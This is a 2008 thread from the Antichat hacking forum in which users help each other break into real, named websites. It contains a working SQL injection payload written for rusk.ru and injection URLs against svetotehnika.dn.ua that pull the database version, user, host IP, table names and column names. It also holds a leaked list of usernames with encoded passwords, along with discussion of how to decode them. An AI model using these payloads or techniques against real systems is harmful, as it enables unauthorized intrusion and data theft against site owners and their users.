Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

26.02.2008, 23:11
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме: 295283
Репутация:
69
|
|
ага понял... там блин = фильтруется надо like пользовать
Спасибо-Сам бы не разобрался
|
|
|

27.02.2008, 01:40
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме: 7084941
Репутация:
2277
|
|
Сообщение от fobofob
и еще вопросик, что это за кодировка паролей :
art:=Ы#џlu/њ$ )
volov:FШ
bazin:VШЦб(¦
rozonova:NЕоА
gaponov:VМВ/юШ
malvina:з[^
anna:eЛдIн >(· ? что это не хеши я знаю,так как на другом сайте с этим движком пароли в открытом виде
очень похоже на бинарный мд5
PHP код:
string md5 (string str [, bool raw_output])
если дать второй параметр, то получится что-то типа твоего
|
|
|

27.02.2008, 01:52
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме: 1845062
Репутация:
1079
|
|
Сообщение от halkfild
очень похоже на бинарный мд5
PHP код:
string md5 (string str [, bool raw_output])
если дать второй параметр, то получится что-то типа твоего
Не похоже. Бинарный md5 всегда содержит одинаковое количество символов, равное шестнадцати. А тут, как видишь, оно все время разное.
|
|
|

27.02.2008, 11:20
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме: 3660186
Репутация:
905
|
|
Возможно, это функция MySql ENCODE или AES_ENCRYPT
|
|
|

27.02.2008, 21:47
|
|
Новичок
Регистрация: 08.12.2007
Сообщений: 21
Провел на форуме: 347718
Репутация:
36
|
|
Все кто может просветите вот в таком вопросе. Есть сайт
http://www.rusk.ru/search.php?action=news
Если в форму "поиск" ввести какую-нибудь ерунду, а на в конце поставить "кавычку", то вылетает ошибка:
SQL ERROR..... N1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sdfd'') > 0))GROUP BY article.idar ORDER BY article.insdate DESC' at line 1
Интересует в обще-то следующее. Это на самом деле SQL? Можно ли из этого что-то "выжать"? А самое главное каков будет рабочий запрос? Ну то есть что надо ввести в поле формы или в УРЛ адрес, чтобы пробить инфу о базе и т.д? Правильно ли я понял, что запрос должен быть не совсем стандартный с использованием скобок? (в тексте описания ошибки они вроде как присутствуют, а где-то читал, что скобки должны быть закрыты в запросе).
Спасибо за возможный ответ.
|
|
|

27.02.2008, 22:10
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
введи в поиске:
sd')>0)) union select 1,2,3,4,5--
незабудь пробел после --
__________________
Карфаген должен быть разрушен...
|
|
|

27.02.2008, 22:58
|
|
Новичок
Регистрация: 08.12.2007
Сообщений: 21
Провел на форуме: 347718
Репутация:
36
|
|
Ух, спасибо, всегда приятно общаться с умным человеком, а то я уж всю голову сломал куда и чего вписать. Оно ж получается, что вся инфа-то в описании ошибки была, тока надо правильно ей пользоваться.
Ещё раз мерси.
|
|
|

27.02.2008, 23:43
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме: 295283
Репутация:
69
|
|
Вчера уже обсуждалась тема по поводу information_schema.columns
cегодня та же проблема, только у меня не получилось ни чар ни лайк, может что-то неправильно делал-объясните пожалуйста!
---------------------------------------------------------
http://www.svetotehnika.dn.ua/templates/svet/index.php?id=181&show=news&newid=-8459+union+select+1,concat_ws(0x3a,version(),user( ),database()),3/*
5.0.32-Debian_7etch1-log:firstline_base@77.221.130.10:firstline_base
TRIGGERS
2103_forum_auth_access
2103_forum_banlist
2103_forum_categories
2103_forum_config
2103_forum_confirm
2103_forum_disallow
2103_forum_forum_prune
2103_forum_forums
2103_forum_groups
2103_forum_posts
2103_forum_privmsgs
2103_forum_privmsgs_text
2103_forum_ranks
2103_forum_sessions_keys
2103_forum_user_group
2103_forum_users
|
|
|

27.02.2008, 23:49
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме: 280720
Репутация:
141
|
|
не впревый раз натыкаюсь на такое
http://louisianaforward.com/view-release.aspx?id=3502'
собственно подскажите что енто такое и можно ли его использовать ? 
|
|
|

28.02.2008, 00:29
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
samarin
на этом сайте всё работает
_http://www.svetotehnika.dn.ua/templates/svet/index.php?id=181&show=news&newid=-8459+union+select+1,column_name,3+from+information _schema.columns+where+table_name=0x323130335f666f7 2756d5f63617465676f72696573+limit+1,1/*
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|